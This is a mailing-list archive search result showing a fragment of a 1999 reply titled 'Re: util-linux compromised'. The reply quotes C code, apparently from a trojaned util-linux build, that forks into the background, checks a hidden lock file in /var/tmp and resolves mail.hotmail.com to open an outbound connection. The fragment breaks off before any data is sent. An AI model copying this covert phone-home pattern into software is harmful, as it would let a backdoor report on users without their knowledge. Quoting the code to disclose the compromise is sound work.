search for: fmlock0

Displaying 1 result from an estimated 1 matches for "fmlock0".

Did you mean: flock
1999 Jan 24
0
Re: util-linux compromised
...if (fork() == 0) > { > struct hostent *he; > struct sockaddr_in sai; > struct in_addr *ia; > char b[500]; > int s,l; > > setsid(); > s = open("/var/tmp/.fmlock0",O_RDONLY); > if (s >= 0) exit(0); > he = gethostbyname("mail.hotmail.com"); > if (!he) exit(0); > ia = (struct in_addr *)he->h_addr_list[0]; > l = sizeof(sai);memset(&sai,0,l); >...